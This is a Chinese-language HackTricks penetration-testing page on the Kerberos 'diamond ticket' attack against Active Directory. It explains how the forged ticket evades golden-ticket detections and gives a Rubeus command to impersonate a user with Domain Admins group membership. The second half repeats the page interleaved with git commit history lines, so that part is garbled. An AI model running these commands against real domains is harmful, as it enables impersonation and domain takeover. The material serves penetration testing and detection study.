hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md

# 钻石票据

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

## 钻石票据

**类似于黄金票据**，钻石票据是一种TGT，可用于**以任何用户身份访问任何服务**。 黄金票据完全是离线伪造的，使用该域的krbtgt哈希进行加密，然后传递到登录会话中供使用。 因为域控制器不会跟踪它（或它们）合法发行的TGT，所以它们会乐意接受用其自身krbtgt哈希加密的TGT。

检测黄金票据使用的两种常见技术：

* 查找没有相应AS-REQ的TGS-REQ。
* 查找具有荒谬值的TGT，例如Mimikatz的默认10年生存期。

**钻石票据**是通过**修改由DC发行的合法TGT的字段**而制作的。 这是通过**请求**一个**TGT**，使用域的krbtgt哈希**解密**它，**修改**票据的所需字段，然后**重新加密**它来实现的。 这**克服了黄金票据的上述两个缺点**，因为：

* TGS-REQ将有一个先前的AS-REQ。
* TGT是由DC发行的，这意味着它将具有来自域Kerberos策略的所有正确详细信息。 即使在黄金票据中可以准确伪造这些信息，但这更加复杂且容易出错。
```bash
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
```
<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现我们的独家[**NFTs**]收藏品，[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								# 钻石票据
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
 								<details>
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['network-services-pentesting/1026-pentesting-rusersd.md', 'n

											
										
										
											2024-01-12 08:16:22 +00:00
+								支持HackTricks的其他方式：
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
 								* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
 								</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 钻石票据
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								**类似于黄金票据**，钻石票据是一种TGT，可用于**以任何用户身份访问任何服务**。 黄金票据完全是离线伪造的，使用该域的krbtgt哈希进行加密，然后传递到登录会话中供使用。 因为域控制器不会跟踪它（或它们）合法发行的TGT，所以它们会乐意接受用其自身krbtgt哈希加密的TGT。
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								检测黄金票据使用的两种常见技术：
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 查找没有相应AS-REQ的TGS-REQ。
 								* 查找具有荒谬值的TGT，例如Mimikatz的默认10年生存期。
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								**钻石票据**是通过**修改由DC发行的合法TGT的字段**而制作的。 这是通过**请求**一个**TGT**，使用域的krbtgt哈希**解密**它，**修改**票据的所需字段，然后**重新加密**它来实现的。 这**克服了黄金票据的上述两个缺点**，因为：
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* TGS-REQ将有一个先前的AS-REQ。
 								* TGT是由DC发行的，这意味着它将具有来自域Kerberos策略的所有正确详细信息。 即使在黄金票据中可以准确伪造这些信息，但这更加复杂且容易出错。
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
+								```bash
 								# Get user RID
 								powershell Get-DomainUser -Identity <username> -Properties objectsid
 								.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512
 								# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
 								# /ticketuser is the username of the principal to impersonate.
 								# /ticketuserid is the domain RID of that principal.
 								# /groups are the desired group RIDs (512 being Domain Admins).
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								# /krbkey is the krbtgt AES256 hash.
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
+								```
 								<details>
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								其他支持HackTricks的方式：
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								* 发现我们的独家[**NFTs**]收藏品，[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												GitBook: [#3390] No subject

											
										
										
											2022-08-15 19:31:10 +00:00
 								</details>